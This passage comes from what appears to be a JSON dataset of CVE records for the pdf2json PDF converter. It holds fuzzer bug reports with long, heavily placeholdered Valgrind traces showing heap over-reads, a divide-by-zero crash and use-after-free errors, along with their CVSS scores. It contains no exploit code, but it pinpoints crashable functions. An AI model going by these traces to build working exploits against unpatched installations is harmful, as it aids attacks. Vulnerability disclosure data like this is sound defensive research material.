NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG e2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG A1F: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, 
double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream Error NUMBERTAG Bad DCT header Error NUMBERTAG Unknown operator APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Thanks, Manh Dung",
    "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
    "severity": "MEDIUM",
    "baseScore": 5.5,
    "impactScore": 3.6,
    "exploitabilityScore": 1.8
  },
  {
    "CVE_ID": "CVE-2020-19473",
    "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/34",
    "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/34",
    "Repo_new": "flexpaper/pdf2json",
    "Issue_Created_At": "2019-05-29T07:15:38Z",
  51488. "description": "Floating point exception on APITAG Hi, Our fuzzer found a bug due to a floating point exception on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Command token too long Error NUMBERTAG Illegal character '>' Error: PDF file is damaged attempting to reconstruct xref table... Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Missing 'endstream' Error NUMBERTAG Bad DCT data: missing NUMBERTAG after ff Error NUMBERTAG Bad DCT header NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG EBDD NUMBERTAG at NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C6C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: 
APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Floating point exception ~~~ Thanks, Manh Dung",
  51489. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51490. "severity": "MEDIUM",
  51491. "baseScore": 5.5,
  51492. "impactScore": 3.6,
  51493. "exploitabilityScore": 1.8
  51494. },
  51495. {
  51496. "CVE_ID": "CVE-2020-19474",
  51497. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/35",
  51498. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/35",
  51499. "Repo_new": "flexpaper/pdf2json",
  51500. "Issue_Created_At": "2019-05-29T15:08:20Z",
  51501. "description": "SEGV (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG BD5: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG 
NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FB: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at 
NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG 
NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b0e8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in 
PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Address NUMBERTAG b2b NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG C5E3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG 
, char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CA4E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG 
APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2af NUMBERTAG is 
NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG F7E: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG C8: memcpy APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG D: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int, double, APITAG APITAG NUMBERTAG by NUMBERTAG C: APITAG , double, double, APITAG ) APITAG NUMBERTAG by NUMBERTAG BE: APITAG , APITAG ) APITAG NUMBERTAG by NUMBERTAG C 
NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG C: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG Address NUMBERTAG b2afa0 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete ](void ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C5D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG EEC9: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG CC3: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E NUMBERTAG F: operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C1C7: APITAG const ) (in PATHTAG NUMBERTAG by NUMBERTAG F8C: APITAG , char , Ref, Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG ECFB: APITAG , Ref , Dict ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , Dict , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DBB: APITAG , Dict , double , double , int, int, APITAG , int, int, int, Function , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CE0: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) 
